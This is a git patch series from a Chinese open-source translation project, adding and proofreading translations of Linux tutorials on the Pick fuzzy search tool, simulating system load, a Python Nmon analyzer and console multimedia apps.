@@ -1,34 +1,38 @@
-Pick - 一款 Linux 上的命令行模糊搜索工具
+Pick:一款 Linux 上的命令行模糊搜索工具
======
-![](https://www.ostechnix.com/wp-content/uploads/2017/09/search-720x340.jpg)
-今天,我们要讲的是一款有趣的命令行工具,名叫 `Pick`。它允许用户通过 ncurses(3X) 界面来从一系列选项中进行选择,而且还支持模糊搜索的功能。当你想要选择某个名字中包含非英文字符的目录或文件时,这款工具就很有用了。你根本都无需学习如何输入非英文字符。借助 Pick,你可以很方便地进行搜索,选择,然后浏览该文件或进入该目录。你甚至无需输入任何字符来过滤文件/目录。这很适合那些有大量目录和文件的人来用。
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/search-720x340.jpg)
-### Pick - 一款 Linux 上的命令行模糊搜索工具
+今天,我们要讲的是一款有趣的命令行工具,名叫 Pick。它允许用户通过 ncurses(3X) 界面来从一系列选项中进行选择,而且还支持模糊搜索的功能。当你想要选择某个名字中包含非英文字符的目录或文件时,这款工具就很有用了。你根本都无需学习如何输入非英文字符。借助 Pick,你可以很方便地进行搜索、选择,然后浏览该文件或进入该目录。你甚至无需输入任何字符来过滤文件/目录。这很适合那些有大量目录和文件的人来用。
-#### 安装 Pick
+### 安装 Pick
+
+对 Arch Linux 及其衍生品来说,Pick 放在 [AUR][1] 中。因此 Arch 用户可以使用类似 [Pacaur][2],[Packer][3],以及 [Yaourt][4] 等 AUR 辅助工具来安装它。
-对 **Arch Linux** 及其衍生品来说,pick 放在 [**AUR**][1] 中。因此 Arch 用户可以使用类似 [**Pacaur**][2],[**Packer**][3],以及 [**Yaourt**][4] 等 AUR 辅助工具来安装它。
```
pacaur -S pick
```
或者,
+
```
packer -S pick
```
或者,
+
```
yaourt -S pick
```
-**Debian**,**Ubuntu**,**Linux Mint** 用户则可以通过运行下面命令来安装 Pick。
+Debian,Ubuntu,Linux Mint 用户则可以通过运行下面命令来安装 Pick。
+
```
sudo apt-get install pick
```
-其他的发行版则可以从[**这里 **][5] 下载最新的安装包,然后按照下面的步骤来安装。在写本指南时,其最新版为 1.9.0。
+其他的发行版则可以从[这里][5]下载最新的安装包,然后按照下面的步骤来安装。在写本指南时,其最新版为 1.9.0。
+
```
wget https://github.com/calleerlandsson/pick/releases/download/v1.9.0/pick-1.9.0.tar.gz
tar -zxvf pick-1.9.0.tar.gz
@@ -36,81 +40,87 @@ cd pick-1.9.0/
```
使用下面命令进行配置:
+
```
./configure
```
-最后,构建并安装 pick:
+最后,构建并安装 Pick:
+
```
make
sudo make install
```
-#### 用法
+### 用法
通过将它与其他命令集成能够大幅简化你的工作。我这里会给出一些例子,让你理解它是怎么工作的。
让们先创建一堆目录。
+
```
mkdir -p abcd/efgh/ijkl/mnop/qrst/uvwx/yz/
```
-现在,你想进入目录 `/ijkl/`。你有两种选择。可以使用 **cd** 命令:
+现在,你想进入目录 `/ijkl/`。你有两种选择。可以使用 `cd` 命令:
+
```
cd abcd/efgh/ijkl/
```
-或者,创建一个[**快捷方式 **][6] 或者说别名指向这个目录,这样你可以迅速进入该目录。
+或者,创建一个[快捷方式][6] 或者说别名指向这个目录,这样你可以迅速进入该目录。
+
+但,使用 `pick` 命令则问题变得简单的多。看下面这个例子。
-但,使用 "pick" 命令则问题变得简单的多。看下面这个例子。
```
cd $(find . -type d | pick)
```
这个命令会列出当前工作目录下的所有目录及其子目录,你可以用上下箭头选择你想进入的目录,然后按下回车就行了。
-**像这样:**
+像这样:
-[![][7]][8]
+![][8]
而且,它还会根据你输入的内容过滤目录和文件。比如,当我输入 “or” 时会显示如下结果。
-[![][7]][9]
+![][9]
-这只是一个例子。你也可以将 “pick” 命令跟其他命令一起混用。
+这只是一个例子。你也可以将 `pick` 命令跟其他命令一起混用。
这是另一个例子。
+
```
find -type f | pick | xargs less
```
-该命令让你选择当前目录中的某个文件并用 less 来查看它。
+该命令让你选择当前目录中的某个文件并用 `less` 来查看它。
-[![][7]][10]
+![][10]
+
+还想看其他例子?还有呢。下面命令让你选择当前目录下的文件或目录,并将之迁移到其他地方去,比如这里我们迁移到 `/home/sk/ostechnix`。
-还想看其他例子?还有呢。下面命令让你选择当前目录下的文件或目录,并将之迁移到其他地方去,比如这里我们迁移到 **/home/sk/ostechnix**。
```
mv "$(find . -maxdepth 1 |pick)" /home/sk/ostechnix/
```
-[![][7]][11]
+![][11]
通过上下按钮选择要迁移的文件,然后按下回车就会把它迁移到 `/home/sk/ostechnix/` 目录中的。
-[![][7]][12]
+![][12]
-从上面的结果中可以看到,我把一个名叫 “abcd” 的目录移动到 "ostechnix" 目录中了。
+从上面的结果中可以看到,我把一个名叫 `abcd` 的目录移动到 `ostechnix` 目录中了。
-使用案例是无限的。甚至 Vim 编辑器上还有一个叫做 [**pick.vim**][13] 的插件让你在 Vim 中选择更加方便。
+使用方式是无限的。甚至 Vim 编辑器上还有一个叫做 [pick.vim][13] 的插件让你在 Vim 中选择更加方便。
要查看详细信息,请参阅它的 man 页。
+
```
man pick
```
-我们的讲解至此就结束了。希望这狂工具能给你们带来帮助。如果你觉得我们的指南有用的话,请将它分享到您的社交网络上,并向大家推荐 OSTechNix 博客。
-
-
+我们的讲解至此就结束了。希望这款工具能给你们带来帮助。如果你觉得我们的指南有用的话,请将它分享到您的社交网络上,并向大家推荐我们。
--------------------------------------------------------------------------------
@@ -118,7 +128,7 @@ via: https://www.ostechnix.com/pick-commandline-fuzzy-search-tool-linux/
作者:[SK][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
@@ -130,9 +140,9 @@ via: https://www.ostechnix.com/pick-commandline-fuzzy-search-tool-linux/
[5]:https://github.com/calleerlandsson/pick/releases/
[6]:https://www.ostechnix.com/create-shortcuts-frequently-used-directories-shell/
[7]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[8]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_001-3.png ()
-[9]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_002-1.png ()
-[10]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_004-1.png ()
-[11]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_005.png ()
-[12]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_006-1.png ()
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_001-3.png
+[9]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_002-1.png
+[10]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_004-1.png
+[11]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_005.png
+[12]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_006-1.png
[13]:https://github.com/calleerlandsson/pick.vim/
From 63810c64ceb106602efa3174ea342e68a6d40ab0 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 14 Jan 2018 10:10:01 +0800
Subject: [PATCH 316/371] PUB:20170925 A Commandline Fuzzy Search Tool For
Linux.md
@lujun9972 https://linux.cn/article-9234-1.html
---
.../20170925 A Commandline Fuzzy Search Tool For Linux.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20170925 A Commandline Fuzzy Search Tool For Linux.md (100%)
diff --git a/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md b/published/20170925 A Commandline Fuzzy Search Tool For Linux.md
similarity index 100%
rename from translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
rename to published/20170925 A Commandline Fuzzy Search Tool For Linux.md
From 8b53900e7d72ab08201a049d6dc6d1b000125fe1 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 14 Jan 2018 10:32:44 +0800
Subject: [PATCH 317/371] PRF&PUB:20170924 Simulate System Loads.md
@lujun9972 https://linux.cn/article-9235-1.html
---
.../20170924 Simulate System Loads.md | 43 +++++++++----------
1 file changed, 21 insertions(+), 22 deletions(-)
rename {translated/tech => published}/20170924 Simulate System Loads.md (56%)
diff --git a/translated/tech/20170924 Simulate System Loads.md b/published/20170924 Simulate System Loads.md
similarity index 56%
rename from translated/tech/20170924 Simulate System Loads.md
rename to published/20170924 Simulate System Loads.md
index 66b74be5c1..8c079664d9 100644
--- a/translated/tech/20170924 Simulate System Loads.md
+++ b/published/20170924 Simulate System Loads.md
@@ -1,71 +1,70 @@
-模拟系统负载的方法
+在 Linux 上简单模拟系统负载的方法
======
+
系统管理员通常需要探索在不同负载对应用性能的影响。这意味着必须要重复地人为创造负载。当然,你可以通过专门的工具来实现,但有时你可能不想也无法安装新工具。
-每个 Linux 发行版中都自带有创建负载的工具。他们不如专门的工具那么灵活但它们是现成的,而且无需专门学习。
+每个 Linux 发行版中都自带有创建负载的工具。他们不如专门的工具那么灵活,但它们是现成的,而且无需专门学习。
### CPU
下面命令会创建 CPU 负荷,方法是通过压缩随机数据并将结果发送到 `/dev/null`:
+
```
cat /dev/urandom | gzip -9 > /dev/null
-
```
如果你想要更大的负荷,或者系统有多个核,那么只需要对数据进行压缩和解压就行了,像这样:
+
```
cat /dev/urandom | gzip -9 | gzip -d | gzip -9 | gzip -d > /dev/null
-
```
-按下 `CTRL+C` 来暂停进程。
+按下 `CTRL+C` 来终止进程。
-### RAM
+### 内存占用
-下面命令会减少可用内存的总量。它是是通过在内存中创建文件系统然后往里面写文件来实现的。你可以使用任意多的内存,只需哟往里面写入更多的文件就行了。
+下面命令会减少可用内存的总量。它是通过在内存中创建文件系统然后往里面写文件来实现的。你可以使用任意多的内存,只需哟往里面写入更多的文件就行了。
+
+首先,创建一个挂载点,然后将 ramfs 文件系统挂载上去:
-首先,创建一个挂载点,然后将 `ramfs` 文件系统挂载上去:
```
mkdir z
mount -t ramfs ramfs z/
-
```
第二步,使用 `dd` 在该目录下创建文件。这里我们创建了一个 128M 的文件:
+
```
dd if=/dev/zero of=z/file bs=1M count=128
-
```
文件的大小可以通过下面这些操作符来修改:
- + **bs=** 块大小。可以是任何数字后面接上 **B**( 表示字节 ),**K**( 表示 KB),**M**( 表示 MB) 或者 **G**( 表示 GB)。
- + **count=** 要写多少个块
+- `bs=` 块大小。可以是任何数字后面接上 `B`(表示字节),`K`(表示 KB),`M`( 表示 MB)或者 `G`(表示 GB)。
+- `count=` 要写多少个块。
+### 磁盘 I/O
+创建磁盘 I/O 的方法是先创建一个文件,然后使用 `for` 循环来不停地拷贝它。
-### Disk
+下面使用命令 `dd` 创建了一个全是零的 1G 大小的文件:
-创建磁盘 I/O 的方法是先创建一个文件,然后使用 for 循环来不停地拷贝它。
-
-下面使用命令 `dd` 创建了一个充满零的 1G 大小的文件:
```
dd if=/dev/zero of=loadfile bs=1M count=1024
-
```
-下面命令用 for 循环执行 10 次操作。每次都会拷贝 `loadfile` 来覆盖 `loadfile1`:
+下面命令用 `for` 循环执行 10 次操作。每次都会拷贝 `loadfile` 来覆盖 `loadfile1`:
+
```
for i in {1..10}; do cp loadfile loadfile1; done
-
```
-通过修改 `{1。.10}` 中的第二个参数来调整运行时间的长短。
+通过修改 `{1..10}` 中的第二个参数来调整运行时间的长短。(LCTT 译注:你的 Linux 系统中的默认使用的 `cp` 命令很可能是 `cp -i` 的别名,这种情况下覆写会提示你输入 `y` 来确认,你可以使用 `-f` 参数的 `cp` 命令来覆盖此行为,或者直接用 `/bin/cp` 命令。)
若你想要一直运行,直到按下 `CTRL+C` 来停止,则运行下面命令:
+
```
while true; do cp loadfile loadfile1; done
-
```
--------------------------------------------------------------------------------
@@ -73,7 +72,7 @@ via: https://bash-prompt.net/guides/create-system-load/
作者:[Elliot Cooper][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 8e420d2aa87fe35068532bd86f9976349c06c9d2 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sun, 14 Jan 2018 11:05:10 +0800
Subject: [PATCH 318/371] =?UTF-8?q?20180113-1=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../tech/20180104 How does gdb call functions.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename "sources/tech/20180104 \tHow does gdb call functions.md" => sources/tech/20180104 How does gdb call functions.md (100%)
diff --git "a/sources/tech/20180104 \tHow does gdb call functions.md" b/sources/tech/20180104 How does gdb call functions.md
similarity index 100%
rename from "sources/tech/20180104 \tHow does gdb call functions.md"
rename to sources/tech/20180104 How does gdb call functions.md
From 9535c3e5aae2d58e7ab1910d9ff274a87e764f15 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sun, 14 Jan 2018 13:22:02 +0800
Subject: [PATCH 319/371] apply for translation
---
sources/tech/20160808 Top 10 Command Line Games For Linux.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20160808 Top 10 Command Line Games For Linux.md b/sources/tech/20160808 Top 10 Command Line Games For Linux.md
index ebce8a8073..1dbe6030f3 100644
--- a/sources/tech/20160808 Top 10 Command Line Games For Linux.md
+++ b/sources/tech/20160808 Top 10 Command Line Games For Linux.md
@@ -1,3 +1,5 @@
+ translated by cyleft
+
Top 10 Command Line Games For Linux
======
Brief: This article lists the **best command line games for Linux**.
From e60ec783758dc724f5c6b5824cf2f273a61cb11e Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 14 Jan 2018 16:10:37 +0800
Subject: [PATCH 320/371] translate done: 20121211 Python Nmon Analyzer- moving
away from excel macros.md
---
...Analyzer- moving away from excel macros.md | 101 ------------------
...Analyzer- moving away from excel macros.md | 100 +++++++++++++++++
2 files changed, 100 insertions(+), 101 deletions(-)
delete mode 100644 sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
create mode 100644 translated/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
diff --git a/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md b/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
deleted file mode 100644
index 3591e379d5..0000000000
--- a/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
+++ /dev/null
@@ -1,101 +0,0 @@
-translating by lujun9972
-Python Nmon Analyzer: moving away from excel macros
-======
-[Nigel's monitor][1], dubbed "Nmon", is a fantastic tool for monitoring, recording and analyzing a Linux/*nix system's performance over time. Nmon was originally developed by IBM and Open Sourced in the summer of 2009. By now Nmon is available on just about every linux platfrom and architecture. It provides a great real-time command line visualization of current system statistics, such as CPU, RAM, Network and Disk I/O. However, Nmon's greatest feature is the capability to record system performance snapshots over time.
-For example: `nmon -f -s 1`.
-![nmon CPU and Disk utilization][2]
-This will create a log file starting of with some system metadata(Section AAA - BBBV), followed by timed snapshots of all monitored system attributes, such as CPU and Memory usage. This produces a file that is hard to directly interpret with a spreadsheet application, hence the birth of the [Nmon_Analyzer][3] excel macro. This tool is great, if you have access to Windows/Mac with Microsoft Office installed. If not there is also the Nmon2rrd tool, which generates RRD input files to generate your graphs. This is a very rigid approach and slightly painful. Now to provide a more flexible tool, I am introducing the pyNmonAnalyzer, which aims to provide a customization solution for generating organized CSV files and simple HTML reports with [matplotlib][4] based graphs.
-
-### Getting Started:
-
-System requirements:
-As the name indicates you will need python. Additionally pyNmonAnalyzer depends on matplotlib and numpy. If you are on a debian-derivative system these are the packages you'll need to install:
-```
-$> sudo apt-get install python-numpy python-matplotlib
-
-```
-
-##### Getting pyNmonAnalyzer:
-
-Either clone the git repository:
-```
-$> git clone git@github.com:madmaze/pyNmonAnalyzer.git
-
-```
-
-or
-
-Download the current release here: [pyNmonAnalyzer-0.1.zip][5]
-
-Next we need an an Nmon file, if you do not already have one, either use the example provided in the release or record a sample: `nmon -F test.nmon -s 1 -c 120`, this will record 120 snapshots at 1 second intervals to test.nmon.
-
-Lets have a look at the basic help output:
-```
-$> ./pyNmonAnalyzer.py -h
-usage: pyNmonAnalyzer.py [-h] [-x] [-d] [-o OUTDIR] [-c] [-b] [-r CONFFNAME]
- input_file
-
-nmonParser converts Nmon monitor files into time-sorted
-CSV/Spreadsheets for easier analysis, without the use of the
-MS Excel Macro. Also included is an option to build an HTML
-report with graphs, which is configured through report.config.
-
-positional arguments:
- input_file Input NMON file
-
-optional arguments:
- -h, --help show this help message and exit
- -x, --overwrite overwrite existing results (Default: False)
- -d, --debug debug? (Default: False)
- -o OUTDIR, --output OUTDIR
- Output dir for CSV (Default: ./data/)
- -c, --csv CSV output? (Default: False)
- -b, --buildReport report output? (Default: False)
- -r CONFFNAME, --reportConfig CONFFNAME
- Report config file, if none exists: we will write the
- default config file out (Default: ./report.config)
-
-```
-
-There are 2 main options of using this tool
-
- 1. Turn the nmon file into a set of separate CSV file
- 2. Generate an HTML report with matplotlib graphs
-
-
-
-The following command does both:
-```
-$> ./pyNmonAnalyzer.py -c -b test.nmon
-
-```
-
-This will create a directory called ./data in which you will find a folder of CSV files ("./data/csv/"), a folder of PNG graphs ("./data/img/") and an HTML report ("./data/report.html").
-
-By default the HTML report will include graphs for CPU, Disk Busy, Memory utilization and Network transfers. This is all defined in a self explanitory configuration file, "report.config". At the moment this is not yet very flexible as CPU and MEM are not configurable besides on or off, but one of the next steps will be to refine the plotting approach and to expose more flexibility with which graphs plot which data points.
-
-### Report Example:
-
-[![pyNmonAnalyzer Graph output][6]
-**Click to see the full Report**][7]
-
-Currently these reports are very bare bones and only prints out basic labeled graphs, but development is on-going. Currently in development is a wizard that will make adjusting the configurations easier. Please do let me know if you have any suggestions, find any bugs or have feature requests.
-
---------------------------------------------------------------------------------
-
-via: https://matthiaslee.com/python-nmon-analyzer-moving-away-from-excel-macros/
-
-作者:[Matthias Lee][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://matthiaslee.com/
-[1]:http://nmon.sourceforge.net/
-[2]:https://matthiaslee.com//content/images/2015/06/nmon_cpudisk.png
-[3]:http://www.ibm.com/developerworks/wikis/display/WikiPtype/nmonanalyser
-[4]:http://matplotlib.org/
-[5]:https://github.com/madmaze/pyNmonAnalyzer/blob/master/release/pyNmonAnalyzer-0.1.zip?raw=true
-[6]:https://matthiaslee.com//content/images/2017/04/teaser-short_0.png (pyNmonAnalyzer Graph output)
-[7]:http://matthiaslee.com/pub/pyNmonAnalyzer/data/report.html
diff --git a/translated/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md b/translated/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
new file mode 100644
index 0000000000..c772ceff73
--- /dev/null
+++ b/translated/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
@@ -0,0 +1,100 @@
+Python 版的 Nmon 分析器:让你远离 excel 宏
+======
+[Nigel's monitor][1],也叫做 "Nmon",是一个很好的监控,记录和分析 Linux/*nix 系统性能随时间变化的工具。Nmon 最初由 IBM 开发并于 2009 年夏天开源。时至今日 Nmon 已经在所有 linux 平台和架构上都可用了。它提供了大量的实时工具来可视化当前系统统计信息,这些统计信息包括 CPU,RAM,网络和磁盘 I/O。然而,Nmon 最棒的特性是可以随着时间的推移记录系统性能快照。
+比如:`nmon -f -s 1`。
+![nmon CPU and Disk utilization][2]
+会创建一个日志文件,该日志文件最开头是一些系统的元数据 T( 章节 AAA - BBBV),后面是定时抓取的监控系统属性的快照,比如 CPU 和内存的使用情况。这个文件很难直接由电子表格应用来处理,因此诞生了 [Nmon_Analyzer][3] excel 宏。如果你用的是 Windows/Mac 并安装了 Microsoft Office,那么这个工具非常不错。如果没有这个环境那也可以使用 Nmon2rrd 工具,这个工具能将日志文件转换 RRD 输入文件,进而生成图形。这个过程很死板而且有点麻烦。现在出现了一个更灵活的工具,像你们介绍一下 pyNmonAnalyzer,它一个可定制化的解决方案来生成结构化的 CSV 文件和基于 [matplotlib][4] 生成图片的简单 HTML 报告。
+
+### 入门介绍:
+
+系统需求:
+从名字中就能看出我们需要有 python。此外 pyNmonAnalyzer 还依赖于 matplotlib 和 numpy。若你使用的是 debian 衍生的系统,则你需要先安装这些包:
+```
+$> sudo apt-get install python-numpy python-matplotlib
+
+```
+
+##### 获取 pyNmonAnalyzer:
+
+你可页克隆 git 仓库:
+```
+$> git clone git@github.com:madmaze/pyNmonAnalyzer.git
+
+```
+
+或者
+
+直接从这里下载:[pyNmonAnalyzer-0.1.zip][5]
+
+接下来我们需要一个 Nmon 文件,如果没有的话,可以使用发行版中提供的实例或者自己录制一个样本:`nmon -F test.nmon -s 1 -c 120`,会录制每个 1 秒录制一次,供录制 120 个快照道 test.nmon 文件中 .nmon。
+
+让我们来看看基本的帮助信息:
+```
+$> ./pyNmonAnalyzer.py -h
+usage: pyNmonAnalyzer.py [-h] [-x] [-d] [-o OUTDIR] [-c] [-b] [-r CONFFNAME]
+ input_file
+
+nmonParser converts Nmon monitor files into time-sorted
+CSV/Spreadsheets for easier analysis, without the use of the
+MS Excel Macro. Also included is an option to build an HTML
+report with graphs, which is configured through report.config.
+
+positional arguments:
+ input_file Input NMON file
+
+optional arguments:
+ -h, --help show this help message and exit
+ -x, --overwrite overwrite existing results (Default: False)
+ -d, --debug debug? (Default: False)
+ -o OUTDIR, --output OUTDIR
+ Output dir for CSV (Default: ./data/)
+ -c, --csv CSV output? (Default: False)
+ -b, --buildReport report output? (Default: False)
+ -r CONFFNAME, --reportConfig CONFFNAME
+ Report config file, if none exists: we will write the
+ default config file out (Default: ./report.config)
+
+```
+
+该工具有两个主要的选项
+
+ 1。将 nmon 文件传唤成一系列独立的 CSV 文件
+ 2。使用 matplotlib 生成带图形的 HTML 报告
+
+
+
+下面命令既会生成 CSV 文件,也会生成 HTML 报告:
+```
+$> ./pyNmonAnalyzer.py -c -b test.nmon
+
+```
+
+这会常见一个 `。/data` 目录,其中有一个存放 CSV 文件的目录 ("。/data/csv/"),一个存放 PNG 图片的目录 ("。/data/img/") 以及一个 HTML 报告 ("。/data/report.html")。
+
+默认情况下,HTML 报告中会用图片展示 CPU,磁盘繁忙度,内存使用情况和网络传输情况。所有这些都定义在一个自解释的配置文件中 ("report.config")。目前这个工具 h 那不是特别的灵活,因为 CPU 和 MEM 除了 on 和 off 外,无法做其他的配置。不过下一步将会改进作图的方法并允许用户灵活地指定针对哪些数据使用哪种作图方法。
+
+### 报告的例子:
+
+[![pyNmonAnalyzer Graph output][6]
+**Click to see the full Report**][7]
+
+目前这些报告还十分的枯燥而且只能打印出基本的几种标记图表,不过它的功能还在不断的完善中。目前在开发的是一个向导来让配置调整变得更容易。如果有任何建议,找到任何 bug 或者有任何功能需求,欢迎与我交流。
+
+--------------------------------------------------------------------------------
+
+via: https://matthiaslee.com/python-nmon-analyzer-moving-away-from-excel-macros/
+
+作者:[Matthias Lee][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://matthiaslee.com/
+[1]:http://nmon.sourceforge.net/
+[2]:https://matthiaslee.com//content/images/2015/06/nmon_cpudisk.png
+[3]:http://www.ibm.com/developerworks/wikis/display/WikiPtype/nmonanalyser
+[4]:http://matplotlib.org/
+[5]:https://github.com/madmaze/pyNmonAnalyzer/blob/master/release/pyNmonAnalyzer-0.1.zip?raw=true
+[6]:https://matthiaslee.com//content/images/2017/04/teaser-short_0.png (pyNmonAnalyzer Graph output)
+[7]:http://matthiaslee.com/pub/pyNmonAnalyzer/data/report.html
From 4e72cb886de22f200e19977f21bab856bcff5524 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 14 Jan 2018 16:14:37 +0800
Subject: [PATCH 321/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Multimedia=20Apps?=
=?UTF-8?q?=20for=20the=20Linux=20Console?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...1 Multimedia Apps for the Linux Console.md | 106 ++++++++++++++++++
1 file changed, 106 insertions(+)
create mode 100644 sources/tech/20180111 Multimedia Apps for the Linux Console.md
diff --git a/sources/tech/20180111 Multimedia Apps for the Linux Console.md b/sources/tech/20180111 Multimedia Apps for the Linux Console.md
new file mode 100644
index 0000000000..3f3849db6c
--- /dev/null
+++ b/sources/tech/20180111 Multimedia Apps for the Linux Console.md
@@ -0,0 +1,106 @@
+Multimedia Apps for the Linux Console
+======
+When last we met, we learned that the Linux console supports multimedia. Yes, really! You can enjoy music, movies, photos, and even read PDF files without being in an X session with MPlayer, fbi, and fbgs. And, as a bonus, you can enjoy a Matrix-style screensaver for the console, CMatrix.
+
+You will probably have make some tweaks to your system to make this work. The examples used here are for Ubuntu Linux 16.04.
+
+### MPlayer
+
+You're probably familiar with the amazing and versatile MPlayer, which supports almost every video and audio format, and runs on nearly everything, including Linux, Android, Windows, Mac, Kindle, OS/2, and AmigaOS. Using MPLayer in your console will probably require some tweaking, depending on your Linux distribution. To start, try playing a video:
+```
+$ mplayer [video name]
+
+```
+
+If it works, then hurrah, and you can invest your time in learning useful MPlayer options, such as controlling the size of the video screen. However, some Linux distributions are managing the framebuffer differently than in the olden days, and you may have to adjust some settings to make it work. This is how to make it work on recent Ubuntu releases.
+
+First, add yourself to the video group.
+
+Second, verify that `/etc/modprobe.d/blacklist-framebuffer.conf` has this line: `#blacklist vesafb`. It should already be commented out, and if it isn't then comment it. All the other module lines should be un-commented, which prevents them from loading. Side note: if you want to dig more deeply into managing your framebuffer, the module for your video card may give better performance.
+
+Add these two modules to the end of `/etc/initramfs-tools/modules`, `vesafb` and `fbcon`, then rebuild the initramfs image:
+```
+$ sudo nano /etc/initramfs-tools/modules
+ # List of modules that you want to include in your initramfs.
+ # They will be loaded at boot time in the order below.
+ fbcon
+ vesafb
+
+$ sudo update-initramfs -u
+
+```
+
+[fbcon][1] is the Linux framebuffer console. It runs on top of the framebuffer and adds graphical features. It requires a framebuffer device, which is supplied by the `vesafb` module.
+
+Now you must edit your GRUB2 configuration. In `/etc/default/grub` you should see a line like this:
+```
+GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
+
+```
+
+It may have some other options, but it should be there. Add `vga=789`:
+```
+GRUB_CMDLINE_LINUX_DEFAULT="quiet splash vga=789"
+
+```
+
+Reboot and enter your console (Ctrl+Alt+F1), and try playing a video. This command selects the `fbdev2` video device; I haven't learned yet how to know which one to use, but I had to use it to play the video. The default screen size is 320x240, so I scaled it to 960:
+```
+$ mplayer -vo fbdev2 -vf scale -zoom -xy 960 AlienSong_mp4.mov
+```
+
+And behold Figure 1. It's grainy because I have a low-fi copy of this video, not because MPlayer is making it grainy.
+
+MPLayer plays CDs, DVDs, network streams, and has a giant batch of playback options, which I shall leave as your homework to explore.
+
+### fbi Image Viewer
+
+`fbi`, the framebuffer image viewer, comes in the [fbida][2] package on most Linuxes. It has native support for the common image file formats, and uses `convert` (from Image Magick), if it is installed, for other formats. Its simplest use is to view a single image file:
+```
+$ fbi filename
+
+```
+
+Use the arrow keys to scroll a large image, + and - to zoom, and r and l to rotate 90 degress right and left. Press the Escape key to close the image. You can play a slideshow by giving `fbi` a list of files:
+```
+$ fbi --list file-list.txt
+
+```
+
+`fbi` supports autozoom. With `-a` `fbi` controls the zoom factor. `--autoup` and `--autodown` tell `fbi` to only zoom up or down. Control the blend time between images with `--blend [time]`, in milliseconds. Press the k and j keys to jump behind and ahead in your file list.
+
+`fbi` has commands for creating file lists from images you have viewed, and for exporting your commands to a file, and a host of other cool options. Check out `man fbi` for complete options.
+
+### CMatrix Console Screensaver
+
+The Matrix screensaver is still my favorite (Figure 2), second only to the bouncing cow. [CMatrix][3] runs on the console. Simply type `cmatrix` to start it, and Ctrl+C stops it. Run `cmatrix -s` to launch it in screensaver mode, which exits on any keypress. `-C` changes the color. Your choices are green, red, blue, yellow, white, magenta, cyan, and black.
+
+CMatrix supports asynchronous key presses, which means you can change options while it's running.
+
+`-B` is all bold text, and `-B` is partially bold.
+
+### fbgs PDF Viewer
+
+It seems that the addiction to PDF documents is pandemic and incurable, though PDFs are better than they used to be, with live hyperlinks, copy-paste, and good text search. The `fbgs` console PDF viewer is part of the `fbida` package. Options include page size, resolution, page selections, and most `fbi` options, with the exceptions listed in `man fbgs`. The main option I use is page size; you get `-l`, `xl`, and `xxl` to choose from:
+```
+$ fbgs -xl annoyingpdf.pdf
+
+```
+
+Learn more about Linux through the free ["Introduction to Linux" ][4]course from The Linux Foundation and edX.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/learn/intro-to-linux/2018/1/multimedia-apps-linux-console
+
+作者:[][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:
+[1]:https://www.mjmwired.net/kernel/Documentation/fb/fbcon.txt
+[2]:https://www.kraxel.org/blog/linux/fbida/
+[3]:http://www.asty.org/cmatrix/
+[4]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From 394d943093cff8e800cd6ccf1481b686386a3f4c Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 14 Jan 2018 16:17:44 +0800
